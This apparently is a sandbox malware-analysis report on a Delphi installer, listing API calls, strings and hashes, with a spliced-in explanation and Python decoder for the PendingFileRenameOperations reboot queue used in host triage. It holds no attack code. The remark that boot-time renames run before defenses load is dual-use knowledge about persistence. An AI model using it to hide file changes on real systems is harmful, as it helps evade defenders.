                                                                          • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                          • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                          • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                          • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                            • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                            • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory$shell32.dll
                                                                          • API String ID: 3376378930-1375355148
                                                                          • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                          • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                          • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                          • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                          • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                          • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                          • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                            • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                            • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                            • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                            • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                          • API String ID: 854858120-3415487018
                                                                          • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                          • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                          • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                          • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                          • OemToCharA.USER32(?,?), ref: 0042376C
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                          • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                          • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                          • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                            • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                            • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                            • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                            • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                            • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                            • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                            • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                            • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                            • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                            • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3476490787-2767913252
                                                                          • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                          • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                          • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                          • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                          • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                          • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                          • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                          Strings
                                                                          • PendingFileRenameOperations, xrefs: 00454C70
                                                                          • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                          • WININIT.INI, xrefs: 00454D00
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                          • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                          • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                          • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
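The routine above (xrefs 00454C54 to 00454D00) opens SYSTEM\CurrentControlSet\Control\Session Manager, reads PendingFileRenameOperations and PendingFileRenameOperations2, and falls back to WININIT.INI: the standard way of asking whether a restart is already outstanding. That value is also the queue that MoveFileEx fills when called with MOVEFILE_DELAY_UNTIL_REBOOT, and the session manager replays it at the next boot before most user-mode defenses are up, so it is worth decoding whenever a host is triaged. The decoder below is an added example, not code from the report or from the sample: the key path and value names come from the listing above, the sample value is constructed, and read_from_registry is a Windows-only helper (assumed to run with read access to HKLM) that the offline example never calls.

```python
"""Decode Session Manager\\PendingFileRenameOperations (added example, not from the report)."""
from dataclasses import dataclass
from typing import Dict, List, Optional

SESSION_MANAGER_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager"
PENDING_VALUES = ("PendingFileRenameOperations", "PendingFileRenameOperations2")
NT_PREFIX = "\\??\\"   # MoveFileEx stores NT-style paths


@dataclass(frozen=True)
class PendingOp:
    source: str
    target: Optional[str]      # None: the source is deleted at boot
    replace_existing: bool     # target was written with a leading '!' (MOVEFILE_REPLACE_EXISTING)

    @property
    def kind(self) -> str:
        return "delete" if self.target is None else "rename"


def _strip_nt(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_ops(entries: List[str]) -> List[PendingOp]:
    """entries is the REG_MULTI_SZ as a list of strings in registry order: source, target, source, target..."""
    if len(entries) % 2:
        # Some registry readers drop a final empty string, which is exactly the
        # "delete" target of the last pair; restore it instead of failing.
        entries = list(entries) + [""]
    ops = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        replace = dst.startswith("!")
        if replace:
            dst = dst[1:]
        ops.append(PendingOp(_strip_nt(src), _strip_nt(dst) if dst else None, replace))
    return ops


def reboot_pending(values: Dict[str, List[str]]) -> bool:
    """The installer-style check mirrored from the listing: any non-empty pending list means a restart is due."""
    return any(values.get(name) for name in PENDING_VALUES)


def read_from_registry() -> Dict[str, List[str]]:
    """Windows-only helper (assumption: caller can read HKLM). Not exercised offline."""
    import winreg  # standard library, Windows only
    found: Dict[str, List[str]] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SESSION_MANAGER_KEY) as key:
        for name in PENDING_VALUES:
            try:
                data, kind = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                continue
            if kind == winreg.REG_MULTI_SZ:
                found[name] = list(data)
    return found


# Constructed sample value: one rename that replaces an existing file, one delete-at-boot.
SAMPLE_VALUE = [
    r"\??\C:\Program Files\Example\app.exe.new", r"!\??\C:\Program Files\Example\app.exe",
    r"\??\C:\Users\user\AppData\Local\Temp\stage.tmp", "",
]

if __name__ == "__main__":
    print("restart pending:", reboot_pending({"PendingFileRenameOperations": SAMPLE_VALUE}))
    for op in parse_pending_ops(SAMPLE_VALUE):
        print(op.kind, op.source, "->", op.target, "(replace existing)" if op.replace_existing else "")
```

On a live host, feed the output of read_from_registry into parse_pending_ops for each value name; a queued delete of a file you did not expect, or a queued rename over a file under Program Files or System32, is the finding to chase.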
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: $pI$.tmp$oI
                                                                          • API String ID: 1375471231-740224434
                                                                          • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                          • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                          • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                          • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                          APIs
                                                                          • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                          • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                          • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID: lAB
                                                                          • API String ID: 4191631535-3476862382
                                                                          • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                          • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                          • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                          • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                          • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                          • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                          • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                          • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                          • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                          • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                          APIs
                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                          • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                          • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                          • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
